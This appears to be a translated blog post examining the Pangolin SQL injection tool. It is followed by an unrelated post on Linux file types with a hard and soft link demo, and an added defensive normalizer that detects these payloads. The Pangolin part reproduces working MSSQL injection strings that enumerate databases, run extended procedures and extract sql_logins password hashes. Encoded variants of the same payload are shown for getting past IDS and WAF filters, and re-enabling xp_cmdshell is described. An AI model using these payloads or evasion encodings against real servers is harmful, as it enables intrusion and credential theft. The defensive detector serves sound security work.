 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 4 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 5 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
 and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 6 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
 ;drop table pangolin_test_table;--
 ;create table pangolin_test_table(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--
 ;insert pangolin_test_table exec master.dbo.xp_availablemedia;--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) from(select top  1 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) from(select top  2 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)--
 ;drop table pangolin_test_table;--
 ;drop table pangolin_test_table;--
 ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
 ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)--
 ;drop table pangolin_test_table;--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password_hash]),char(32)) from(select top  1 [name],[password_hash] from [master].[sys].[sql_logins] order by [name]) t order by [name] desc)--
 and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password_hash]),char(32)) from(select top  2 [name],[password_hash] from [master].[sys].[sql_logins] order by [name]) t order by [name] desc)--


The queries sent by default are shown above.
Looking at the part marked in red (the pangolin_test_table lines), it creates a table named pangolin_test_table (create), inserts specific data into it (insert), selects the data from that table (select) and, once all the work is done, drops the table (drop).

The information obtained this way is displayed in the UI.

With the default option (Auto-analyzing keyword), spaces are replaced with %20 when the query is sent.
This is the same as doing it by hand: even if you type plain spaces, the URL is requested with them converted to %20 anyway.


0x02 Pangolin SQL Injection Query by Advanced Setting

The queries sent are the same as the defaults; the only difference is the form in which the SQL injection query is sent.
Let's look at the distinctive features of each option one by one.


Replace space as /**/

Replaces the space characters with /**/. This is a technique often used to evade IDS pattern matching.

/board_view.asp?num=16/**/and/**/(select/**/top/**/1/**/cast([name]/**/as/**/nvarchar(500))%2bchar(94)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/[dbid]/**/in/**/(select/**/top/**/1/**/[dbid]/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/[dbid]/**/desc))%3E0--

Inserting /**/ this way still gets detected by the IDS. -_-;;
To evade a string-matching IDS that looks for "select", for example, the query would have to be sent as something like se/**/le/**/ct; this option only replaces the spaces with /**/, so the probability of being detected by the IDS is very high.


Replace space as +

/board_view.asp?num=16+and+(select+top+1+cast([name]+as+nvarchar(500))%2bchar(94)+from+[master].[dbo].[sysdatabases]+where+[dbid]+in+(select+top+1+[dbid]+from+[master].[dbo].[sysdatabases]+order+by+[dbid]+desc))%3E0--


Replace space as %09

/board_view.asp?num=16%09and%09(select%09top%091%09cast([name]%09as%09nvarchar(500))%2bchar(94)%09from%09[master].[dbo].[sysdatabases]%09where%09[dbid]%09in%09(select%09top%091%09[dbid]%09from%09[master].[dbo].[sysdatabases]%09order%09by%09[dbid]%09desc))%3E0--


Replace space as [TAB]

/board_view.asp?num=16%09and%09(select%09top%091%09cast([name]%09as%09nvarchar(500))%2bchar(94)%09from%09[master].[dbo].[sysdatabases]%09where%09[dbid]%09in%09(select%09top%091%09[dbid]%09from%09[master].[dbo].[sysdatabases]%09order%09by%09[dbid]%09desc))%3E0-- 

Since %09 is the TAB character, the %09 option and the [TAB] option send the identical query.


Bypass firewall filter when 'select' is not allow

This option is for bypassing a filter when the string "select" is not allowed.

/board_view.asp?num=16%20and%20(se%l%e%c%t%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(se%l%e%c%t%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

It changes select to se%l%e%c%t and sends the query. Because the web server ignores a lone %, in the end only the string "select" is recognized. An IDS or WAF that inspects incoming HTTP packets as-is would fail to detect it, but a device that decodes the request the way the web server does before matching would make this option useless as well.


URI Encode Mode

/board_view.asp?num=%31%36%20%61%6e%64%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%63%61%73%74%28%5b%6e%61%6d%65%5d%20%61%73%20%6e%76%61%72%63%68%61%72%28%35%30%30%29%29%2b%63%68%61%72%28%39%34%29%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%77%68%65%72%65%20%5b%64%62%69%64%5d%20%69%6e%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%5b%64%62%69%64%5d%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%6f%72%64%65%72%20%62%79%20%5b%64%62%69%64%5d%20%64%65%73%63%29%29%3E%30%2d%2d


Converts every character to its hex value and sends the query. Well, decoding it just gives the same query you saw above.


Enable BT Model (bypass firewall)

If you switch the language to Korean, it shows up as "변태모드" (pervert mode). -_-;;

/board_view.asp?num=16%20an%d%20(se%l%e%c%t%20to%p%201%20ca%st([name]%20as%20nvarch%ar(500))%2bch%ar(94)%20fr%om%20[master].[dbo].[sysdatabases]%20wh%ere%20[dbid]%20in%20(se%l%e%c%t%20to%p%201%20[dbid]%20fr%om%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

It sends the query with % characters stuffed in at random places. I guess that's why it's called pervert mode.


Stop after error happens(access data)

/board_view.asp?num=16%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--

Like the default Auto-analyzing keyword option, it sends spaces as %20. Going by the option name, it seems to mean "stop when an error occurs while accessing data", but I couldn't confirm which error it is supposed to stop on. On the server I tested, it kept returning results while continuously throwing 500 errors due to type mismatches. From this it can be assumed that it means: stop when an error occurs that prevents the desired value from being retrieved any further.


Auto check record count of tables

/board_view.asp?num=16%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
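As an added defender-side example (not part of the original post and not Pangolin's own code): a normalizer that undoes each encoding shown above, the /**/, +, %09/[TAB], stray-% and URI Encode forms, before matching SQL keywords, which is the "decode the way the web server does" approach the post says would defeat these options. The signature set and the helper names are my own assumptions; the sample request lines are the ones quoted in the post.

```python
import re
from urllib.parse import unquote_plus

# Keyword signatures applied to the NORMALIZED query (constructed for this example).
SIGNATURES = {
    "select_from": re.compile(r"\bselect\b.*\bfrom\b"),
    "stacked_statement": re.compile(r";\s*(drop|create|insert|exec)\b"),
    "system_catalog": re.compile(r"\b(sysdatabases|sysobjects|syscolumns|sql_logins)\b"),
    "extended_proc": re.compile(r"\bxp_\w+"),
}

def normalize(url: str) -> str:
    """Reduce a request URL to roughly what the web server and SQL Server see."""
    query = url.split("?", 1)[1] if "?" in url else url
    # 1. '+' -> space, then %XX decoding: covers the %20, +, %09/[TAB] and
    #    URI Encode modes.  Invalid escapes such as '%l' survive untouched.
    text = unquote_plus(query)
    # 2. Drop every '%' that did not form a valid escape, mimicking the server
    #    behaviour the post describes (se%l%e%c%t -> select, an%d -> and).
    #    A literal '%' decoded from %25 is dropped too; fine for a detector.
    text = text.replace("%", "")
    # 3. Inline comments used as whitespace (/**/) become a single space.
    text = re.sub(r"/\*.*?\*/", " ", text)
    # 4. Collapse runs of spaces/tabs and lower-case for case-insensitive matching.
    return re.sub(r"\s+", " ", text).strip().lower()

def detect(url: str) -> list:
    """Signature names matching the normalized query, in SIGNATURES order."""
    norm = normalize(url)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

# The request lines from the post, one per Pangolin option.
SAMPLES = {
    "%20": "/board_view.asp?num=16%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--",
    "/**/": "/board_view.asp?num=16/**/and/**/(select/**/top/**/1/**/cast([name]/**/as/**/nvarchar(500))%2bchar(94)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/[dbid]/**/in/**/(select/**/top/**/1/**/[dbid]/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/[dbid]/**/desc))%3E0--",
    "+": "/board_view.asp?num=16+and+(select+top+1+cast([name]+as+nvarchar(500))%2bchar(94)+from+[master].[dbo].[sysdatabases]+where+[dbid]+in+(select+top+1+[dbid]+from+[master].[dbo].[sysdatabases]+order+by+[dbid]+desc))%3E0--",
    "%09": "/board_view.asp?num=16%09and%09(select%09top%091%09cast([name]%09as%09nvarchar(500))%2bchar(94)%09from%09[master].[dbo].[sysdatabases]%09where%09[dbid]%09in%09(select%09top%091%09[dbid]%09from%09[master].[dbo].[sysdatabases]%09order%09by%09[dbid]%09desc))%3E0-- ",
    "no-select": "/board_view.asp?num=16%20and%20(se%l%e%c%t%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(se%l%e%c%t%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--",
    "uri-encode": "/board_view.asp?num=%31%36%20%61%6e%64%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%63%61%73%74%28%5b%6e%61%6d%65%5d%20%61%73%20%6e%76%61%72%63%68%61%72%28%35%30%30%29%29%2b%63%68%61%72%28%39%34%29%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%77%68%65%72%65%20%5b%64%62%69%64%5d%20%69%6e%20%28%73%65%6c%65%63%74%20%74%6f%70%20%31%20%5b%64%62%69%64%5d%20%66%72%6f%6d%20%5b%6d%61%73%74%65%72%5d%2e%5b%64%62%6f%5d%2e%5b%73%79%73%64%61%74%61%62%61%73%65%73%5d%20%6f%72%64%65%72%20%62%79%20%5b%64%62%69%64%5d%20%64%65%73%63%29%29%3E%30%2d%2d",
    "bt-mode": "/board_view.asp?num=16%20an%d%20(se%l%e%c%t%20to%p%201%20ca%st([name]%20as%20nvarch%ar(500))%2bch%ar(94)%20fr%om%20[master].[dbo].[sysdatabases]%20wh%ere%20[dbid]%20in%20(se%l%e%c%t%20to%p%201%20[dbid]%20fr%om%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--",
}

if __name__ == "__main__":
    for opt, url in SAMPLES.items():
        print(f"{opt:>10}: {detect(url)}")
    print("    benign:", detect("/board_view.asp?num=16"))
```

Every variant collapses to the same canonical string, so one signature covers all seven options; keyword signatures alone still produce false positives on ordinary text, which is why the normalization, not the keyword list, is the point.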


You will get a rough idea of what the other features do just by trying them once.
I wanted to look at them in more detail, but I'm lazy, so I think I'll stop here... (You've barely done anything and you're stopping here!!! -_-;;)


One thing that had changed was the part that executes commands with xp_cmdshell on MSSQL 2005.
On MSSQL 2005, xp_cmdshell is disabled by default, so it has to be re-enabled. In version 2.x, however, when the DB type was "MSSQL2005 with Error", it did not run properly even after enabling it.

In Pro 3.0 the Restore xp_cmdshell option worked fine and there was no problem executing commands.
The one thing that was still odd was that the result came back about 5 times instead of once.
I haven't figured out exactly why yet. -_-


I'll have to set aside some time later to go through the many other features calmly.


Types of Linux files -

system/linux 2010. 1. 6. 22:47

◎ In Linux everything is organized in units of files forming a hierarchical structure, and a file consists of three elements: the file name, the I-node, and the data blocks.

- File name: used by the user to access and manipulate the file

- I-node: the data structure on disk that describes the file; used to record information about the file.
             Since I-node numbers are integers starting from 0 within each partition, files on different partitions can have the same I-node number.

   * Information stored in the I-node: the file's owner (user, group), the file's access mode, the file's timestamps (last modification, last access), the file's type.

   * Checking the I-node

 #ls -il

- Data blocks: the area holding the actual file data

 

- Regular file: the file type can be checked with

 #ls -lF

-rw-r--r--  1  root  root  1301  7월  18  16:55  anaconda-ks.cfg

- Directory file: a special file denoting a space set aside so that related files can be stored together as one group. A directory contains at least two I-node numbers -> the I-node numbers of . (the current directory) and .. (the parent directory).

 

- Link files

   * Symbolic link = soft link: similar to a shortcut icon in Windows. Because it is a file that points to the path of another file, deleting the symbolic link file has no effect on the actual original file.
                                         Linking is possible even across different file systems.

             Command location (/bin/ln)

#ln -s [original file] [symbolic link file]

ex)

#ls -il /dir1/file1

1268199  lrwxrwxrwx  1  root  root  11  9월  21  13:26  dir1/file1 -> /root.file1

//  checked after creating a symbolic link from /root/file1 to /root/dir1/file1

- Hard link: makes a duplicate of the original file; that is, it creates a file that has the same I-node.

             Command location (/bin/ln)

 #ln [original file] [hard link file]

ex)

#ls -il dir1/file1

1268195  -rw-r--r--  2  root  root  0  9월  20  00:28  dir1/file1

#ls -il file1

1268195  -rw-r--r--  2  root  root  0  9월  20  00:28  file1

 

- Device files: files that represent hardware or peripheral devices, e.g. hard disks, floppy disks, printers, mice, etc.

   * Block device file (Block Device File): uses specific buffers inside the kernel for input/output; data is transferred in large block-sized units at a time.

       Devices that use block device files: hard disks, floppy disks, tape drives, magneto-optical drives

 #ls -l

brw-rw----  1  root root ~~~~~~~~~~~

   * Character device file (Character Device File): transfers data byte by byte without using the system's I/O buffers.

       Devices that use character device files: terminals, printers, plotters

 #ls -l

crw-rw---- 1 root root ~~~~~~~~~~~~~~~
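As an added example (not from the original post): the same facts checked from Python instead of with ls -il and ln. It creates a file, a hard link and a symbolic link in a scratch directory, reads the fields ls -il prints (type, I-node number, link count) with os.lstat, and then deletes the names in turn. The file names and helper names are my own assumptions.

```python
import os
import stat
import tempfile

def ls_type_char(path: str) -> str:
    """First column of `ls -l`: -, d, l, b, c, p or s.  lstat is used so a
    symbolic link reports itself (the 'l' in lrwxrwxrwx), as `ls -il` does."""
    mode = os.lstat(path).st_mode
    for test, ch in ((stat.S_ISREG, "-"), (stat.S_ISDIR, "d"), (stat.S_ISLNK, "l"),
                     (stat.S_ISBLK, "b"), (stat.S_ISCHR, "c"),
                     (stat.S_ISFIFO, "p"), (stat.S_ISSOCK, "s")):
        if test(mode):
            return ch
    return "?"

def link_demo() -> dict:
    """Create file1, a hard link and a symbolic link in a scratch directory
    and return the I-node facts stated in the post."""
    d = tempfile.mkdtemp()                      # constructed scratch directory
    orig, hard, sym = (os.path.join(d, n) for n in ("file1", "file1_hard", "file1_sym"))
    with open(orig, "w") as f:
        f.write("data\n")
    os.link(orig, hard)                         # ln file1 file1_hard
    os.symlink(orig, sym)                       # ln -s file1 file1_sym
    st_orig, st_hard, st_sym = os.stat(orig), os.stat(hard), os.lstat(sym)
    out = {
        "types": (ls_type_char(orig), ls_type_char(sym), ls_type_char(d)),
        "hard_shares_inode": st_orig.st_ino == st_hard.st_ino,   # same I-node
        "sym_shares_inode": st_sym.st_ino == st_orig.st_ino,     # its own I-node
        "nlink_with_hard_link": st_orig.st_nlink,  # the '2' in the ls -il output
    }
    os.remove(sym)                              # deleting the symlink...
    out["orig_after_sym_removed"] = os.path.exists(orig)   # ...leaves the original
    os.remove(orig)                             # deleting the original name...
    with open(hard) as f:
        out["data_via_hard_link"] = f.read()    # ...data still reachable by the hard link
    out["nlink_after_orig_removed"] = os.stat(hard).st_nlink
    os.remove(hard)
    os.rmdir(d)
    return out

if __name__ == "__main__":
    for k, v in link_demo().items():
        print(f"{k}: {v}")
```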


tistory start -

cl is - 2009. 12. 31. 15:40
- by cl
